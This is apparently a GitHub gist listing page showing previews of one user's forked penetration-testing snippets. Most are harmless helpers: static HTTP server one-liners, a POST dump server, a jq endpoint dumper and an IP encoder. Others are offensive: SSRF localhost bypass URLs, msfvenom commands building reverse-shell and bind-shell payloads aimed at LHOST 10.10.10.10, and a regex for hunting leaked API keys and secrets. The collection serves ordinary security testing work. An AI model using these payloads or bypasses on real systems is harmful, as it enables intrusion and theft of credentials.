Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
saraiva
saraiva
/ bypasses.txt
Created
March 14, 2024 15:12
— forked from bayotop/bypasses.txt
Various useful bypasses
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SSRF localhost (@omespino) | |
| http://127.0.0.1 | |
| http://[::]/ # ipv6 | |
| http://0/ | |
| http://localtest.me # dns to 127.0.0.1 | |
| http://2130706433/ # decimal | |
| http://0x7f000001/ # hex | |
| http://0x7f.0x00.0x00.0x01 # hex | |
| http://0177.0.0.01 # octal |
saraiva
/ web-servers.md
Created
March 11, 2024 08:45
— forked from willurd/web-servers.md
Big list of http static server one-liners
saraiva
/ msf_pay.md
Created
February 15, 2024 17:28
— forked from dejisec/msf_pay.md
MSFVenom Payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
saraiva
/ post-server.py
Created
February 3, 2024 17:55
— forked from kylemcdonald/post-server.py
Python POST simple server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import SimpleHTTPServer | |
| import SocketServer | |
| PORT = 8000 | |
| class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): | |
| def do_POST(self): | |
| content_len = int(self.headers.getheader('content-length', 0)) | |
| post_body = self.rfile.read(content_len) |
saraiva
/ Generic keys
Created
January 22, 2024 18:06
— forked from h4x0r-dz/Generic keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
saraiva
/ dump-endpoints.jq
Created
January 14, 2024 15:18
— forked from DanaEpp/dump-endpoints.jq
jq query and filter to dump the HTTP method, route and description of every endpoint in an OpenAPI 3.0 document. Usage: jq -r -f dump-endpoints.jq openapidoc.json
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .paths | to_entries | map(select(.key | test("^x-") | not)) | map ( .key as $path | .value | to_entries | map( select( .key | IN("get", "put", "post", "delete", "options", "head", "patch", "trace")) | { method: .key, path: $path, summary: .value.summary?, deprecated: .value.deprecated? })[] ) | map( .method + "\t" + .path + "\t" + .summary + (if .deprecated then " (deprecated)" else "" end)) [] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| You can run this in the following format: | |
| For decimal: python3 ip2dh.py D <Ip-address> | |
| For Hexadecimal: python3 ip2dh.py H <Ip-address> | |
| """ | |
| #!/usr/bin/python3 | |
| import sys | |
| if len(sys.argv) < 3: |
saraiva
/ 2serv.py
Created
February 27, 2021 18:35
— forked from phrawzty/2serv.py
simple python http server to dump request headers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import SimpleHTTPServer | |
| import SocketServer | |
| import logging | |
| PORT = 8000 | |
| class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): |
saraiva
/ phpdangerousfuncs.md
Created
February 17, 2021 16:34
— forked from mccabe615/phpdangerousfuncs.md
Dangerous PHP Functions
exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program